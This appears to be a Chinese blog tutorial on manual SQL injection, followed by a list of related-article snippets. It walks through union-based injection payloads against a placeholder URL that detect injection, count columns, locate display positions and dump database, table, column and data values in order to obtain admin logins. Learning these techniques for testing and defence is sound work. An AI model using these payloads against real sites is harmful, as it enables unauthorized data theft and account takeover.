SQL注入原理及具体步骤

最新推荐文章于 2025-06-06 18:04:28 发布
原创 最新推荐文章于 2025-06-06 18:04:28 发布 · 置顶 · 2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #mysql #sql #安全

SQL注入原理

步骤

  1. 通过特殊的数据库查询语句
  2. 在数据库的错误返回中找到sql漏洞
  3. 利用sql语句猜解管理人员信息并登陆管理员后台

判断注入类型

下面提到的是数字型和字符型的注入, sql注入还有基于报错型SQL注入、基于布尔/时间的SQL注入、可联合查询的SQL注入

判断数字型注入

  1. url为 http://192.168.1.1/search?id=1’时
    有一个多余的“’”使查询错误
  2. url为 http://192.168.1.1/search?id=1 and 1 = 1 时, 没有报错, 除非在代码处做了限制(不允许有and字符串)
  3. url为 http://192.168.1.1/search?id=1 and 1 = 2 时, 由于1=2不成立, 也会报错

判断字符型注入

url同样为 http://192.168.1.1/search?id=1’时, 数据库认为id叫做“1’”,查询之后发现没有这个id而返回错误.

在字符型注入中,需要考虑引号的闭合

http://192.168.1.1/search?id=1’ and ‘1’=‘1
在’1’=‘1 之后没有加上’是因为传参时输入的内容已经被’ '包围.

判断后台查询列数

使用order by 试出数据库列数
http://192.168.1.1/search?id=1’ order by 数字
如果试6时返回错误, 5时正确.那么列数为5

找显示位

使用union select找出会返回给客户端并显示的列.
如果有5列时,应该这么写http://192.168.1.1/search?id=1 union select 1,2,3,4,5
加入显示位是5,这就意味着数据库之开放了“5”这个窗口用以显示,那么在查询其他信息(如数据库名)时应该用需要查询到信息替换它来显示这些信息

查库名

  • 联合查询: select database();

假如显示位是5, http://192.168.1.1/search?id=1 union select 1,2,3,4,database()

  • 盲注使用其他方法
    (还没学到这里,到时候补充)

查表名

找到库名之后
使用http://192.168.1.1/search?id=1 union select 1,2,3,4,table_name from information_schema.tables where table_schema=‘库名’

如果是字符型,此处库名要转换成十六进制

information_schema

这是一个mysql自带的库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等,故我们需要查询这个库

查列名

http://192.168.1.1/search?id=1 union select 1,2,3,4,column_name from information_schema.columns where table_name=‘表名’

如果是字符型,此处表名要转换成十六进制

如果表数或列数过多,可以在最后使用limit

加上limit 0,5 相当于检索1-5条

查具体数据

http://192.168.1.1/search?id=1 union select 1,2,3,4,group_concat(查询的数据) from 表名

! .
关注
专栏目录
【网络安全SQL注入原理及常见攻击方法简析
等风来
04-18 8678
因此,攻击者可以在用户名或密码中添加 --,来注释掉后面的字符串,从而绕过过滤器的检测。攻击者不停地尝试不同的SQL语句,观察程序的响应时间,从而判断SQL语句是否正确,进而获取数据库中的敏感信息。该方法的基本原理是,在输入框中输入一个带有单引号的字符串,如果应用程序对输入参数没有进行正确的过滤转义,则会发生语法错误,进而证明存在 SQL 注入漏洞。基于布尔盲注的SQL注入攻击是一种利用目标Web应用程序对SQL查询条件正确/错误响应的不同表现来推测查询语句的正确性,从而获取数据库中敏感信息的攻击方式。
《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
热门推荐
wangyuxiang946的博客
05-13 1万+
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入功能原理相关知识
ASP和PHP工作经验
03-12 1498
SQL注入功能原理相关知识 作者:夜狼    文章来源:动易论坛    点击数:36    更新时间:2008-3-12         SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全
sql注入原理过程
菜菜鸟_黑马的专栏
09-27 2098
 记得前一个月左右,记得那是刚来中心不久,kevin想学怎么进行sql注入。看了JHACKJ超级入侵教程中的sql入侵的视频,还去bbs.14023.com下载了流光、nbsi2.0、wed、wis,想模仿着进行,无奈一直没有成功。呵呵,可以说那个时候是水平不行,只会依葫芦画瓢,仅仅用用工具,不是很明白sql注入原理。    今天下午4点左右开始,一直到晚上8点,又kevin一起,终于对一个
SQL注入之联合查询注入
最新发布
kfashfasf的博客
06-06 600
联合查询注入是一种常见的SQL注入攻击手法,其核心原理是利用SQL中的UNION操作符将多个SELECT语句的结果集合并,从而返回一个统一的结果集。在使用UNION时,必须确保前后两个查询的列数相同,且对应列的数据类型兼容。攻击者通过构造恶意查询,将数据库中的敏感信息(如数据库名称、表名、列名等)与正常查询结果一并输出,从而窃取关键数据。这种攻击方式通常用于探测数据库结构并获取未经授权的信息。
SQL注入原理及产生过程
weixin_34311757的博客
06-26 495
最近在学习关于SQL注入方面的知识,想将一些相关的知识点做个汇总笔记,方便日后的查阅也方便现在的学习。因为刚开始学习,涉猎还没有很深入,本章将简单的讲讲关于SQL注入原理及其产生的过程基本的一些加固方法。 1.理解SQL注入SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析执行...
SQL注入学习教程(二)
wuqingCL的博客
11-05 240
首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种: (A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:Select * from 表名 where 字段=49注入的参数为ID=49 And [查询条件],即是生成语句:Select * from 表名 where 字段=49 A...
教务系统mysql注入原理_SQL注入原理具体步骤
weixin_30406901的博客
01-21 490
SQL注入原理步骤 1. 通过特殊的数据库查询语句 2. 在数据库的错误返回中找到sql漏洞 3. 利用sql语句猜解管理人员信息并登陆管理员后台判断注入类型下面提到的是数字型字符型的注入, sql注入还有基于报错型SQL注入、基于布尔/时间的SQL注入、可联合查询的SQL注入判断数字型注入url为 http://192.168.1.1/search?id=1 and 1 = 1 时, 没有报错...
sql注入原理及php防注入代码.doc
01-12
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL语句来操纵数据库。当应用程序没有正确地过滤或转义用户提供的数据时,就...通过这些步骤,你可以显著提高PHP应用程序的安全性,有效防止SQL注入攻击。
计算机病毒与防护:SQL注入原理.ppt
06-10
**计算机病毒与防护:SQL注入原理** SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的Web应用程序。这种攻击手段是由于应用程序在处理用户输入时没有进行充分的验证过滤,使得攻击者可以...
SQL注入原理步骤以及黑名单绕过方式_java sql注入黑名单绕过
2401_84970145的博客
05-13 1476
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入原理及过程简单介绍
Soda_199的博客
08-09 6673
1、产生SQL注入原因        开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤。SQL 注入过程目的性是非常强的,其主要目标是 Web 应用的后台数据库,从数据库中获取信息授予较高的权限,它先破坏数据库,再对数据库服务器进行破坏。 2、SQL注入原理 首先要了解web网站的架构: Web 网站架构...
SQL注入原理、过程及如何防范
Slow_fever_youth的博客
08-24 2707
SQL注入原理: 定义:通过把SQL命令插入到 web表单提交、输入域名、页面请求的查询字符串,最终达到欺骗服务器 执行恶意的sql命令。 它的本质就是服务器对代码数据不区分,未对用户提交的参数进行校检或者有效的过滤,直接进行sql语句的拼接,改变了原有的sql语义,传进数据库解析引擎中执行。 网页一般分为静态页面动态页面。静态页面一般是HTML或者htm页面格式,不需要服务器解析脚本。也就不存在sql漏洞,但是它灵活性交互性就很差。动态页面一般是asp,jsp,php等页面格式,它是由相应的脚
sql注入基础原理注入方式
A906003660的博客
07-20 1521
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
SQL注入原理--手工联合查询注入技术
Unitue_逆流
01-25 8078
** 实验目的:理解联合查询原理、学习联合查询过程 **实验原理: 1、链接后面添加【order by 11(数字任意)】根据页面返回结果,来判断站点中的字段数目 2、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】进行联合查询,来暴露可查询的字段编号 3、根据上一步得到的字段编号,查询语句【union se...
sql注入攻击的原理(非常详细),零基础入门到精通,看这一篇就够了
分享Python知识
11-13 4732
sql注入攻击的原理(非常详细),零基础入门到精通,看这一篇就够了
SQL数字型注入
kuiguowei的博客
01-12 9707
SQL注入攻击的产生 当应用程序使用输入内容来构造动态SQL语句以访问数据库时,会发生SQL注入攻击。 如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生SQL注入SQL注入可能导致攻击者使用应用程序登陆在数据库中执行命令。相关的SQL注入可以通过测试工具pangolin进行。如果应用程序使用特权过高的帐户连接到数据库,这种问题会变得很严重。在
SQL注入原理-手工联合注入查询技术
weixin_30672019的博客
09-17 454
实验报告记录 得到实验结果 转载于:https://www.cnblogs.com/ma1998/p/11536959.html
简述SQL注入手工联合查询技术
hy_696的博客
04-26 564
进入链接http://xxx.xxxx.?id=xx,在网址后边加order by语句,例如order by 11 ,页面显示正常,order by 12 页面报错,则说明此站字段长度为11.假如字段长度为11,则在链接后添加语句 union select 1,2,3,4,5,6,7,8,9,10,11 from admin ,若页面报错后显示数字23,则2,3为显位(admin为表名)。将原语...
sql注入原理及防护
12-28
### SQL 注入原理 SQL注入是一种攻击方式,通过该方法可以向应用程序发送恶意的SQL语句并执行。当Web应用未能正确过滤用户输入中的特殊字符时,攻击者能够构造特定形式的数据作为参数提交给数据库查询命令。如果这些数据未被适当处理,则可能导致原始查询逻辑改变,进而被执行任意指令。 例如,在登录表单中用户名字段可能存在如下漏洞: ```sql SELECT * FROM users WHERE username='admin' AND password='password'; ``` 假设此查询用于验证用户身份,而程序直接拼接字符串来构建最终要发往DBMS执行的SQL语句。此时,若允许未经检查就插入额外的内容到`username`变量里,那么黑客就可以利用这一点绕过认证机制[^1]。 ### 防护措施 为了防止SQL注入的发生,应当采取多种手段相结合的方式来进行防御: #### 输入过滤与转义危险字符 对于所有来自外部环境(如HTTP请求)的信息都应视为不可信源,并对其进行严格的校验清理工作。具体来说就是去除掉那些可能引起语法错误或者具有潜在危害作用的符号;同时还要注意对一些保留字加以转换以免造成混淆误判的情况发生。 ```python import re def sanitize_input(user_input): # Remove or escape special characters from user input sanitized = re.escape(user_input) return sanitized ``` #### 使用预编译语句及参数化查询 采用PreparedStatement接口所提供的功能可以在很大程度上规避风险。因为这种方式下占位符会被服务器端解释成固定位置上的常量而非可变部分,所以即使传入了带有破坏意图的数据也无法影响整个表达式的结构完整性。 ```java String query = "SELECT * FROM users WHERE username=? AND password=?"; try (Connection conn = DriverManager.getConnection(url); PreparedStatement pstmt = conn.prepareStatement(query)) { pstmt.setString(1, userInputUsername); // Set parameter value safely pstmt.setString(2, userInputPassword); ResultSet rs = pstmt.executeQuery(); } ``` #### 输出编码 确保输出至网页的内容经过恰当编码以阻止脚本执行行为。这一步骤同样适用于防范跨站脚本攻击(XSS),即把动态生成的部分按照HTML标准格式呈现出来而不是当作纯文本对待。 ```html <!-- Example of encoding output --> <p>User submitted: <script>alert('XSS')</script></p> ``` 综上所述,遵循安全编程的最佳实践——包括但不限于上述提到的技术策略——可以帮助有效地抵御SQL注入威胁,保护信息系统免受此类侵害的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值